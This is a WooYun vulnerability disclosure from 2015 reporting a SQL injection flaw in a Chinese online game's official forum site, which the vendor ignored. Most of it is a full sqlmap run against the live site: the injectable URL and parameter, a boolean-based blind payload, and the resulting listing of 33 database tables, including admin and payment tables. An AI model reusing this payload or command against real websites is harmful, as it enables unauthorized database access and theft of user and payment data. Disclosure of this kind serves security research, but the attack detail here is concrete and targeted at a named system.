当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103403

漏洞标题:钢甲洪流游戏官方网站存在漏洞

相关厂商:沈阳冰锋网络游戏有限公司

漏洞作者: 希望

提交时间:2015-03-25 16:57

修复时间:2015-05-09 16:58

公开时间:2015-05-09 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入点

详细说明:

http://www.woh.com.cn/bbs/user/userDetails.jsp?userName=
%D0%A1%CC%D5%CC%D5%B0%AE%B1%A6%B1%A6注入点
F:\sqlmap>sqlmap.py -u "http://www.woh.com.cn/bbs/user/userDetails.jsp?userName=
%D0%A1%CC%D5%CC%D5%B0%AE%B1%A6%B1%A6" --tables -D "IEOBBS"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150312}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 03:15:58
[03:15:58] [INFO] resuming back-end DBMS 'oracle'
[03:15:58] [INFO] testing connection to the target URL
[03:15:59] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: userName (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userName=%D0%A1%CC%D5%CC%D5%B0%AE%B1%A6%B1%A6' AND 6725=6725 AND 'T
Wut'='TWut
---
[03:16:00] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[03:16:00] [INFO] fetching tables for database: 'IEOBBS'
[03:16:00] [INFO] fetching number of tables for database 'IEOBBS'
[03:16:00] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[03:16:00] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://www.woh.com.cn/bbs/user/../error.htm'. Do y
ou want to follow? [Y/n] Y
33
[03:16:18] [INFO] retrieved: VOTE
[03:17:01] [INFO] retrieved: TOTALS
[03:18:03] [INFO] retrieved: STOPUSERS
[03:19:30] [INFO] retrieved: SFADMIN
[03:20:34] [INFO] retrieved: REPLY
[03:21:29] [INFO] retrieved: REGISTCOR
[03:23:12] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
PMEM
[03:23:58] [INFO] retrieved: RECORD
[03:24:45] [INFO] retrieved: QUESTIONBAK
[03:26:31] [INFO] retrieved: QUESTION
[03:26:51] [INFO] retrieved: PA
[03:27:41] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
YLOG
[03:28:21] [INFO] retrieved: PAY
[03:28:52] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[03:28:56] [INFO] retrieved: ON_LINE
[03:30:13] [INFO] retrieved: NEWS
[03:31:32] [INFO] retrieved: MESSAGES2
[03:33:03] [INFO] retrieved: MESSAGES
[03:33:23] [INFO] retrieved: MEMBERS
[03:35:00] [INFO] retrieved: LINK
[03:35:44] [INFO] retrieved: KEYSTORE
[03:37:04] [INFO] retrieved: IDTABL
[03:38:19] [CRITICAL] connection dropped or unknown HTTP status code received. T
ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r
andom-agent'. sqlmap is going to retry the request
E
[03:38:36] [INFO] retrieved: FORUM
[03:39:30] [INFO] retrieved: CORPSMEMBER
[03:41:30] [INFO] retrieved: CONSUMELIST
[03:43:03] [INFO] retrieved: CLOSEUSER
[03:44:24] [INFO] retrieved: CLOSEIP
[03:44:59] [INFO] retrieved: CLOSEADMIN
[03:46:00] [INFO] retrieved: CHARACTER
[03:47:50] [INFO] retrieved: CATEGORY
[03:49:02] [INFO] retrieved: CARDINFO
[03:50:19] [INFO] retrieved: AD
[03:51:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
MINISTRATOR
[03:52:54] [INFO] retrieved: ADMIN
[03:53:11] [INFO] retrieved: TOPICS
[03:54:13] [INFO] retrieved: TITLE
[03:55:02] [INFO] retrieved: TB_TRADINFO
Database: IEOBBS
[33 tables]
+---------------+
| CHARACTER |
| ADMIN |
| ADMINISTRATOR |
| CARDINFO |
| CATEGORY |
| CLOSEADMIN |
| CLOSEIP |
| CLOSEUSER |
| CONSUMELIST |
| CORPSMEMBER |
| FORUM |
| IDTABLE |
| KEYSTORE |
| LINK |
| MEMBERS |
| MESSAGES |
| MESSAGES2 |
| NEWS |
| ON_LINE |
| PAY |
| PAYLOG |
| QUESTION |
| QUESTIONBAK |
| RECORD |
| REGISTCORPMEM |
| REPLY |
| SFADMIN |
| STOPUSERS |
| TB_TRADINFO |
| TITLE |
| TOPICS |
| TOTALS |
| VOTE |
+---------------+
[03:56:38] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.woh.com.cn'
[*] shutting down at 03:56:38

漏洞证明:

M$I8XRCA13Q3}X0@V9U0~IS.png

B9X]S9HE_6M[}J21$`AMTCB.jpg

修复方案:

不知道有多少人玩

版权声明:转载请注明来源 希望@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝